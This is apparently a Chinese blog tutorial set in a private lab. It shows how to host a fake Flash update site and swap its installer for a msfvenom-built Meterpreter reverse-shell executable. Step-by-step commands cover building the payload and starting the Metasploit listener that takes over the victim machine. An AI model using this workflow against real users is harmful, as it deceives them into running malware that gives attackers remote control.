伪造flash网站,替换下载软件

已于 2024-11-26 14:44:06 修改
阅读量610 收藏 4
点赞数 10
文章标签: csrf
于 2024-11-26 13:14:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/himyly/article/details/144056020
版权
免责声明

本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。

作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。

在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。

本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。

攻击环境

kali-linux 2024.1(ip:192.168.153.128 作为攻击机)

windows server 2003(ip:192.168.153.40 作为服务器)

windows7(ip:192.168.153.47 作为受害机)

环境搭建

windows server 2003(phpstudy2018版本)

搭建伪造网站将flash网站源码放到phpstudy根目录下

flash网站源码github下载:flash网站源码

攻击步骤

访问搭建的网页

http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html

这样就搭建成功了

打开kali,使用msf生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.153.128 lport=6666 -f exe -o test.exe

其中lhost为本地监听地址也就是kali地址,lport为监听端口,这里需要注意不能和其他端口产生冲突

开启监听模块

msfconsole

选择监听模块

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置监听主机

set lhost 192.168.153.128

设置监听端口

set lport 6666

运行监听模块

exploit

将生成的.exe文件放到windows server 2003的网站路径中,将flash源文件替换,并修改test.exe文件为原文件名称

flash原文件位于:FakeFlash-main\fake_user\fake_flash_domain

原文件为flashcenter_pp_ax_install_cn.exe,我们将他删除并将test.exe文件修改为flashcenter_pp_ax_install_cn.exe

再次访问网站

http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html

点击立即升级,然后下载该exe文件

下载完成之后我们双击运行

返回kali,我们既可以看到windows7已经被拿下了

himyly
关注
Flash水坑钓鱼
god_Zeo的安全博客
02-06 6201
Flash水坑钓鱼起因准备先配置一个马子吧自解压捆绑文件的利用上传到服务器常见用法 起因 在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。 未雨绸缪,先测试一下,以后肯定用的到 准备 flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn 一个服务器 一个域名 一个马子 先配置一个马子吧 使用常用的CS吧,随便来一个,成功上线 关于...
修改伪造Flash版本
friendan的专栏
10-26 1041
有些网站会检测Flash版本号 如何把低版本Flash版本伪造成高版本Flash呢 看图: 经测试发现网站JS获取的Flash版本号是从Flash ocx文件属性:文件说明 中的获取的 所以我们使用eXeScope修改ocx文件属性就可以伪造Flash版本了 C:\Windows\SysWOW64\Macromed\Flash\Flash.ocx ...
20个神奇的伪Flash网站
weixin_34062329的博客
07-10 88
为什么80%的码农都做不了架构师?>>> ...
软件设计师》学习笔记
lskj的博客
07-15 1374
检错:发现错误。纠错:发现错误并给以纠正。一个编码系统的码距是整个编码系统中任意(所有) 两个码字的最小距离。若用1位长度的二进制编码。若A=1,B=0.这样A,B之间的最小码距为1.若用2位长度的二进制编码,若以A= 11,B=00为例,A,B之间的最小码距为2.若用3位长度的二进制编码,可选用111,000作为合法编码,A,B之间的最小码距为3.码距与检错、纠错有何关系?在一个码组内为了检测e个误码,要求最小码距d应该满足:d>e+1。
flask中的session伪造问题
m0_62422842的博客
09-05 3054
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
Flask之session伪造
TenG的博客
05-22 4628
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
CSRF(跨站请求伪造攻击)漏洞详解
rainy_lu的博客
04-17 871
Cross-Site Request Forgery(CSRF),中文一般译作跨站点 请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。   通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequest...
软件设计师-计算机系统知识
woaini886353的博客
05-08 1416
专题一:计算机系统知识 1、计算机硬件基础知识: 1.1计算机系统结构  计算机的发展历史:    1946年,世界上第一台电子计算机ENIAC出现,之后经历了5个发展阶段: 冯式结构计算机的组成部分:存储器、运算器、控制器、输入设备和输出设备。 强化的概念: 计算机的工作过程:一般是由用户使用各种编程语言把所需要完成的任务以程序的形式提交给计算机,然后翻译成计算机能直接执行的机器语言程序,在计算机上运行。 计算机系统可以由下面的模型表示: 计算机系统结构(computer architecture):指机
软件设计师复习资料
热门推荐
zy139的博客
01-27 1万+
从大禹治水看构件与集成 大禹治水   在远古的尧、舜时代,黄河流域经常发生了大水灾,洪水横流,五谷不收,家破人亡。所以尧派鲧去治水,鲧沿用了过去的传统法子,水来土挡,用土筑堤,堵塞漏洞。但由于洪水凶猛,不断冲击土墙,结果弄得堤毁墙塌,洪水反而闹得更凶了。鲧治水九年,劳民伤财,并没有把洪水制服,是一事无成。 舜接替尧后,就把鲧办罪处死,随后命鲧的儿子禹继续治水。大禹领命之后,寻找到了以前治水失败的教...
phpcms 附件替换h5
07-08
综上所述,将PHPCMS V9的Flash上传功能替换为H5上传是一个涉及前端、后端和用户体验的整体工程。通过使用像webuploader-0.1.5这样的H5上传库,我们可以实现更加现代化、安全且用户友好的文件上传功能,从而提高系统...
Flash持续集成自动化单元测试
03-02
在单元测试中,Mock对象可以用来替换复杂的或者未实现的部分,这样可以在不依赖外部系统的情况下测试你的代码逻辑。 在自动化单元测试中,测试用例的选择策略非常重要。一个良好的测试用例应该能够覆盖到代码的多个...
成熟成功男士网站模板是一款大气单页HTML5模板下载。.zip
02-17
同时,为了保证网站的安全性,应遵循最佳实践,如对用户提交的数据进行验证,避免XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等安全风险。 总的来说,这款“成熟成功男士网站模板”集成了HTML5的先进特性,提供了...
WEB漏洞--CSRF及SSRF案例
2301_80629787的博客
04-29 673
测试过不过审核,不过的话算了
CSRF请求伪造
2401_88816569的博客
04-25 985
CSRF如何绕过验证篡改权限?手把手复现靶场请求伪造流程,拆解Cookie层层分析手把手教会,筑牢Web安全防线!
Spring Security 的 CSRF 防护机制
[ta叫我小白]的专栏
04-29 553
Spring Security 中的 .csrf() 是用来开启或配置这种保护机制,防止恶意网站“冒充用户”向你的网站发起请求。
Springboot项目实现简单的 CSRF 防护
qq_33795322的博客
04-29 924
当 元素内的提交按钮( 或 )被点击时,浏览器会自动收集表单内所有具有 name 属性的表单控件(如 、、 等)的值,并按照特定的格式将这些值组合成请求数据,然后根据 元素的 action 和 method 属性来发送 HTTP 请求。这样,在表单提交时,CSRF 令牌就会作为表单数据的一部分被发送到服务器。/deleteLink/**:传输数据的方式为路径变量,双星号 ** 也是通配符,比单星号更强大,能匹配任意数量的路径层级,也就是可以跨层级匹配任意内容,如果使用这种方式传输数据就需要这样写。
Node.js CSRF 保护指南:示例及启用方法
技术超强的网络安全平台
04-27 532
需要注意的是,在需要频繁更改的系统中,有些用户可能会觉得这种多步骤的流程繁琐乏味。受害者,也就是我们这位不懂技术的阿姨,看到了这封邮件,邮件内容是她急需点击邮件中提供的链接,查看银行已标记为可疑的一笔异常交易。例如,当我们的受害者点击恶意链接时,目标 URL 可能会利用新的已验证会话(或者只是登录后打开一个标签页之类的简单操作),对存在漏洞的 Web 应用程序的数据库执行更改。现在我们已经看到,通过使用狡猾的社会工程策略劫持用户的信任来夺取用户的会话并破坏我们的系统是多么容易,让我们来探索一些缓解措施。
PostSwigger 的 CSRF 漏洞总结
anddddoooo的博客
04-27 329
本文所提供的关于 web 安全的相关信息、技术讲解及案例分析等内容,仅用于知识分享与学术交流目的,旨在提升读者对 web 安全领域的认知与理解。以下仅仅是作者对 PostSwigger Web 安全的知识整理和分享,严禁任何非法犯罪活动。限制 CSRF 的三种方式CSRF TokenSameSiteReferer。
scratch少儿编程逻辑思维游戏源码-上下飞行.zip
最新发布
04-30
scratch少儿编程逻辑思维游戏源码-上下飞行.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值